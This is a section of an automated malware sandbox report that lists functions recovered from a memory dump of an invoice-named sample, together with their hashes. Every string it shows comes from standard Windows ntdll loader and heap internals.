API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
Instruction ID: aaded4cd8ebf95b62906e12fcb1336a6a7226f7f3a9f360181f9126fa65daa63
Opcode Fuzzy Hash: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
Instruction Fuzzy Hash: 8F51C1712583049FD721EF28C895BABF7E4FB84648F10492EFA8597155E730EA05CB93

Function 01762674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
SXS: %s() passed the empty activation context, xrefs: 017A2165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
Instruction ID: b56229ad1adb29513a23d60a7e253524e0c70a4a10fbc675dd691000ea439c95
Opcode Fuzzy Hash: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
Instruction Fuzzy Hash: 21313576B80215B7E7258A9DCC85F9AFA6CDBA4A40F054169FF04B7146D270AE00C7A1

Function 0176C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 017A8170
LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
LdrpInitializeProcess, xrefs: 0176C6C4

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
Instruction ID: 9e3f194c11cada4fe2155a87bba23375d60763d850e249dc390ee8db20600dc1
Opcode Fuzzy Hash: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
Instruction Fuzzy Hash: C23106B16443429FD325EF28D859E2AF7E4AF94B10F00055CFD815B299D660ED04CBA2

Function 0177096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
Instruction ID: 294aec694b496bb388cb65d9927a39ad470499d1fe9ee1a2d8527e6ab75bad3b
Opcode Fuzzy Hash: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
Instruction Fuzzy Hash: A6427C71900715DFDB21CF28C884BAAB7F4FF49304F1445AAEA89DB245E770AA84CF61

Function 0173A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0173A3EF
LdrResFallbackLangList Exit, xrefs: 0173A3FF
6, xrefs: 0173A3F7
8, xrefs: 0173A3E7

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
Instruction ID: 204b753e69195aad9da9ea3a1843ca08d0e71c61dc3572be8246aa6abc2507a0
Opcode Fuzzy Hash: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
Instruction Fuzzy Hash: 8CC15674108382DFDB11DF58C045B6AFBE4AF95704F0489AAF9D6CB292E734CA49CB52

Function 01768402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
@, xrefs: 01768591
minkernel\ntdll\ldrinit.c, xrefs: 01768421
LdrpInitializeProcess, xrefs: 01768422

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
Instruction ID: 155a98c67026559d5ed83f444e3bd933b13a9dad264448ecedae1ef35d44da62
Opcode Fuzzy Hash: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
Instruction Fuzzy Hash: 089189B1508345AFDB22DF25CC44FBBFAECEB84744F80092EFA8496156E734D9048B62

Function 0176273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
.Local, xrefs: 017628D8
SXS: %s() passed the empty activation context, xrefs: 017A21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
Instruction ID: 299935536e5a70445eaf632474a6d78ec26c5875d90e59543aa934c348074875
Opcode Fuzzy Hash: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
Instruction Fuzzy Hash: 6FA1A03194422ADBDB65CF68CC88BA9F7B5BF98314F1541E9DD48A7292D7309E80CF90

Function 01764AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
Instruction ID: a17cb9123b7041cec6de0c1789eec40e5e72f3faaab0ead6e59dc717738c260c
Opcode Fuzzy Hash: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
Instruction Fuzzy Hash: 486111766007129BD726CF1CC885B3AF7E9FFC0B50F548669E95A9B245CB30E801CB91

Function 017364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
Instruction ID: edb1c165c01fbd6ee90b699cfc7afcae01eeb58de4fbdaa5f1c78e597994a378
Opcode Fuzzy Hash: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
Instruction Fuzzy Hash: DC71C4B1504305AFCB21DF18C888B9BBFA9EF94764F500468F9488B18BD734D689CBD2

Function 0175245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01752462
minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
LdrpDynamicShimModule, xrefs: 0179A998

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
Instruction ID: 16ebcf08774cd4105eff6bd1ddece48654c2b65bb82d6530acfa5d221b7b60e4
Opcode Fuzzy Hash: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
Instruction Fuzzy Hash: 09314871A00201EBDF329F5DE895A6AFBB5FB84710F254059ED00A724AD7B45A85CB80

Function 017429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01743264
HEAP[%wZ]: , xrefs: 01743255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
Instruction ID: 6923ae33e1ede5849c32b2db0d08caa43051991a760c7241c48573af34bf1d80
Opcode Fuzzy Hash: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
Instruction Fuzzy Hash: 7692AB71A046599FEB25CF68D444BAEFBF1FF48300F188099E899AB392D735A941CF50

Function 01740770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 017950BD
HEAP[%wZ]: , xrefs: 017950AE
(UCRBlock->Size >= *Size), xrefs: 017950CA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
Instruction ID: 1ccb5675b745a34f17a6e136f75a85057889f40830aa1b8ef4020fb23ab02a72
Opcode Fuzzy Hash: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
Instruction Fuzzy Hash: B8F1AB74600606DFEB26CF68D894BAAF7B5FF44300F1481A9E6169B385D734EA85CB90

Function 01756962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01756C24
, xrefs: 0179CA51

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
Instruction ID: 4d9c514500f4892de776b65b26614185211c2c5fb648b227c99c1b0d240e6473
Opcode Fuzzy Hash: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
Instruction Fuzzy Hash: FDC290716083419FEB69CF28C881BABFBE5AF88754F44896DF989C7241D774D804CB92

Function 0172A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0178C1E4
UseFilter, xrefs: 0172A1C1
FilterFullPath, xrefs: 0178C2E6

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
Instruction ID: e71b6a7d1dc35cc9b37f9cb1bab4548466d5b1f42271a7477bb0eda6ab6b042a
Opcode Fuzzy Hash: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
Instruction Fuzzy Hash: C4A14C719416299BDB32EF68CC88BEAF7B8EF44710F1041E9E909A7250D7359E85CF50

Function 01750BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0179A10F
minkernel\ntdll\ldrinit.c, xrefs: 0179A121
LdrpCheckModule, xrefs: 0179A117

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
Instruction ID: e8b1b143c65c239a59f02888702f51d901c594050d76dbf95a22316b9314414c
Opcode Fuzzy Hash: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
Instruction Fuzzy Hash: EA71CF70A002059FDF26DF68C994ABEF7F4FB44304F24846DE802AB255E774AE81CB50

Function 01740A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01795342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0179534D
HEAP[%wZ]: , xrefs: 01795335

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
Instruction ID: 744dc45f388daacf0d277a42be35c4d34a5fe97463bc17b53d54159c02430775
Opcode Fuzzy Hash: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
Instruction Fuzzy Hash: D961A070600301DFDB2ACF28D844BAAFBE1FF45708F14859AE5558B296D770E941CB95

Function 0176C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
Failed to reallocate the system dirs string !, xrefs: 017A82D7
minkernel\ntdll\ldrinit.c, xrefs: 017A82E8

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
Instruction ID: 9bc065b2b5ddb101738f7a952c9754e873f486d79a2f2ef14eb05ca012466e0d
Opcode Fuzzy Hash: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
Instruction Fuzzy Hash: 9A41CF71544311ABC732EF68D848B5BF7E8FB48650F10892AFE98D3295E774D9008B92

Function 017EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 017EC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
@, xrefs: 017EC1F1

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
Instruction ID: 263dfbdc5179beb234f91a6413b022abd1922a3084ef6f2bd4780b71e4ee4c10
Opcode Fuzzy Hash: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
Instruction Fuzzy Hash: B8418375E04219EBDF12DBD8C859FEEFBFCAB18704F10406AE609B7240D7749A448B50

Function 017C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 017C4160
LdrpResValidateFilePath Exit, xrefs: 017C4172
@, xrefs: 017C4225

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
Instruction ID: d36840e083c6461e3094238595bfba5fea09a5075e5e45e850d1c9455866b6ac
Opcode Fuzzy Hash: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
Instruction Fuzzy Hash: 8241F372A042588BEB26DBE8CC58BADFBB9FFA5B40F14045DD942EB785D7748901CB10

Function 017B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
LdrpCheckRedirection, xrefs: 017B488F
minkernel\ntdll\ldrredirect.c, xrefs: 017B4899

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
Instruction ID: 1750b3ba3d392de61f200a0822b763ec551ed660ca01ce348e861a5bfebc43d7
Opcode Fuzzy Hash: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
Instruction Fuzzy Hash: 5141A372A447519FCB22CE5DD8C0BA6FBE4AF49650F050669ED8BD7257D730E800CB91

Function 01740BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0179543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01795449
HEAP[%wZ]: , xrefs: 01795431

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
Instruction ID: e004d0dc8d41594d81ff3cbb5ccb7500000ab659c04f16371dbf1532d31b9971
Opcode Fuzzy Hash: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
Instruction Fuzzy Hash: 11112170315122CFDB6ACB18D854FBAF3A4EF40615F18816AF606CB265DB30D845CB44

Function 017B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 017B20F3
minkernel\ntdll\ldrinit.c, xrefs: 017B2104
LdrpInitializationFailure, xrefs: 017B20FA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
Instruction ID: e0167b30d4c7a33d60a326c9584e0af075d266b751c7b81b8d7e78d0a18cccf4
Opcode Fuzzy Hash: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
Instruction Fuzzy Hash: A0F0C87578130CAFEB34EA4CDC67FD9B768EB44B54F504069FA006B68AD6B0A600CA51

Function 017403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01794D8A

Strings

#%u, xrefs: 01794D82

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
Instruction ID: c8974549364d99d311369286c892d7ab98c58010af7e543bb307fd5768cc8548
Opcode Fuzzy Hash: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
Instruction Fuzzy Hash: EA714771A0014A9FDB01DFA8D994FAEBBF8BF08704F144065EA05E7255EB34EE45CBA0

Function 0173A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0173AA13
LdrResSearchResource Exit, xrefs: 0173AA25

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
Instruction ID: 664489243a321e02717a8daffab9262bda267ecc94eb917b5a51e49cafaef7b3
Opcode Fuzzy Hash: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
Instruction Fuzzy Hash: 06E1A271E00209AFEF26DFA8D985BAEFBBAFF94310F100469E941E7252D7349945CB50

Function 017FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 017FA44B
`, xrefs: 017FA551

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 47a455d474e48fc495d3d3e464a42f52781150a3e6b3c7e5acf3cc0012cdff5b
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: DCC1AC312043429BEB25CF28C845B6BFBE5AFD4318F184A2DF69A8B391D774D505CB92

Function 017AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 017AE75A
UEFI, xrefs: 017AE751

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 4554f8df5c35cb563b68c577ed0ffc73b4b23f9ed15228f767e20941ee93d760
Instruction ID: cc74388a43568bc3274a701ab56032ad523567ca544333135db1229e2a69f2f7
Opcode Fuzzy Hash: 4554f8df5c35cb563b68c577ed0ffc73b4b23f9ed15228f767e20941ee93d760
Instruction Fuzzy Hash: E0616C71E403099FDB15DFA8C880BADFBB5FB88700F94416DE649EB291DB31A940CB50

Function 017D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 017D4525
@, xrefs: 017D4437

Memory Dump Source

